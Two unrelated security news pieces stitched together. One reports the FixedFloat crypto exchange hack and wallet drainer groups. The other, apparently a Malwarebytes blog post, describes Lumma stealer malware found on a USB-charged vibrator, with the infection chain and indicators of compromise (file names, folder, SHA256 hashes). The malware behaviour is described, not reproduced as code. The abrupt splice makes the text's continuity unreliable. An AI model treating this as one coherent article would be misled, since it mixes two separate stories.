> Drainer on Ethereum (1700 ETH stolen): 0x85c4fF99bF0eCb24e02921b0D4b5d336523Fa085… https://t.co/imeXB1h7Jv pic.twitter.com/oquw373NOG
> 
> — Officer's Notes (@officer\_cia) February 19, 2024

“I don’t see any addresses (other than the hacker’s address) that link these 2 HitBTC deposit addresses…Most likely, the hacker created only a false trail,” the researcher **explained** on X (Twitter). This was **confirmed** by the Web3 security platform Cyvers on X as well.

The cryptocurrency exchange confirmed it was an external attack, rubbishing rumours of **insider involvement**. Users and analysts initially claimed FixedFloat developers were behind the hacking, but the exchange denied any internal involvement.

Although the company is yet to reveal the core information on how it happened, cybersecurity researchers are positive that the hack was **caused by vulnerabilities** and insufficient security measures, allowing the attacker to bypass defences and access core service functions.

****Wallet Drainer Attack?****

As to what type of vulnerabilities, researchers believe that it was a wallet drainer attack. A wallet drainer attack is a malicious technique employed by cybercriminals to steal cryptocurrency from unsuspecting victims’ wallets. It typically involves exploiting **vulnerabilities in smart contracts** or tricking users into granting unauthorized access to their funds.

FixedFloat stated that no user funds were affected, but the hack affected 30 outstanding orders, which the exchange will pay as soon as its services resume.

FixedFloat faced criticism for not reporting the hack immediately, while the company maintains it was focusing on minimizing loss and eliminating vulnerabilities. The platform expects full operations to resume soon and release a detailed report after the investigation is complete.

****Surge in Drainer Attacks****

Nevertheless, it is concerning that cryptocurrency exchanges have become a prominent target of scammers lately. Last month Group-IB Global Pvt. Ltd. **disclosed** details of a phishing operation dubbed Inferno Drainer targeting cryptocurrency wallet providers. The scammers targeted over 100 brands and 16,000 malicious domains, stealing over $80 million in digital assets from November 2022 to November 2023. The team reaped $87 million in illicit profits and scammed over 137,000 victims.

In June 2023, Pink Drainer, a notorious hacker group, successfully **executed** a series of high-profile Discord and Twitter hacks targeting projects like Evomos, Pika Protocol, OpenAI CTO, and Orbiter Finance. Online scam detector ScamSniffer confirmed Pink Drainer stole around $3 million from nearly 1,932 victims.

****RELATED ARTICLES****

1.  **Multilingual malware hits Android devices for phishing**
2.  **Scammers Selling Twitter (X) Gold Accounts Fueling Phishing**
3.  **Hacker stole $55M in crypto from DeFi lender bZx via phishing**
4.  **Hackers Aim at Crypto Wallets with Namecheap Phishing Emails**
5.  **Crypt losses reach $1.75 Billion in 2023; CeFi and Hacks Blamed**

Crypto Exchange FixedFloat Hacked: $26 Million in BTC, ETH Stolen

One of our customers found their vibrator was buzzing with a hint of malware.

I know that some of you are expecting a post similar to that about a toothbrush botnet, but this is not a hypothetical case. It actually happened.

A Malwarebytes Premium customer started a thread on Reddit saying we had blocked malware from trying to infect their computer after they connected a vibrator to a USB port in order to charge the device.

The vibrator, Spencer’s Sexology Pussy Power 8-Function Rechargeable Bullet Vibrator, was infected with an information stealer known as Lumma.

Lumma is available through a Malware-as-a-Service (MaaS) model, where cybercriminals pay other cybercriminals for access to malicious software and its related infrastructure. Lumma steals information from cryptocurrency wallets and browser extensions, as well as two-factor authentication details. Lumma is often distributed via email campaigns, but nothing stops the cybercriminals from spreading it through infected USB drives, as is the case here.

The question that remains is, how did the vibrator get infected? The victim bought the vibrator at Spencer’s, so we reached out to the company in an attempt to get to the bottom of this.

Spencer’s acknowledged that it was aware of the problem, but the team investigating the issue was unable to provide further information at this point. We’ll keep you updated if we receive word from them or find out any more information ourselves.

Our advice when it comes to USB devices, including rechargeable vibrators:

*   Don’t connect the USB to your computer for charging. If you use a good old-fashioned AC plug socket then no data transfer can take place while you charge.
*   If you still want the option to connect via USB, USB condoms or “juice-jack defenders” as they are sometimes called will prevent accidental data exchange when your device is plugged into another device with a USB cable.
*   Treat untrusted devices like you would the “lost USB stick” in the parking lot. You know you shouldn’t connect those to your computer, right?
*   Always use security software. In this case, the customer was protected by Malwarebytes Premium. If they weren’t using security software, their personal information might have ended up in the hands of cybercriminals.

**Technical details**

The customer was kind enough to provide us with the content of the flash drive. On it were a host of XML files and a Microsoft Software Installer file (Mia_Khalifa 18+.msi).

The XML files all look very similar to the above and seem to be designed to functions as an XML bomb. An XML bomb is an exponential entity expansion attack, similar to a ZIP bomb, that is designed to crash the web application. This is likely used to draw the attention of the victim away from the actual malware.

The installer creates a program entry called Outweep Dynes.

The Outweep Dynes “program” is yet another installer dropped in %USERPROFILE%\AppData\Local\Outweep Dynes\InstallerPlus_v3e.5m.exe

To hinder reverse engineering, extraction of the executable is password protected. But with the password hardcoded in the file, that was not a problem.

The file then executes a heavily obfuscated portable executable detected by Malwarebytes as Trojan.Crypt.MSIL which is Malwarebytes’ generic detection name for a type of obfuscated Trojan programmed in Microsoft Intermediate Language (MSIL).

The dropped executable is a combination of the Lumma Stealer and an additional .NET dll library.

Malwarebytes ThreatDown customers enjoy protection by Advanced Device Control. When a USB device is connected, ThreatDown now doesn’t just control access—it actively scans it. You can also now choose to block the device until the system scans it. This means threats are stopped in their tracks, well before they can do any harm.

**IOCs**

**Program name:**

Outweep Dynes

**Folder:**

%USERPROFILE%\AppData\Local\Outweep Dynes

**Filenames:**

*   InstallerPlus_v3e.5m.exe
*   Installer-Advanced-Installergenius_v4.8z.1l.exe

**SHA256 hashes:**

*   207ee8fb2a824009fe72a857e041297bde3b82626b8883bc05ca8572b4dd148a
*   e0f4382f4534c2c0071ce0779d21f0fed59f428cdb622b1945e0a54157c19f95
*   be6efe16701cb69ec6e48441a6ad1c1f934e0f92878ccdfafc3f52cbc97be5c2

**Vibrator:**

Spencer’s Sexology Pussy Power 8-Function Rechargeable Bullet Vibrator

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Tag

#auth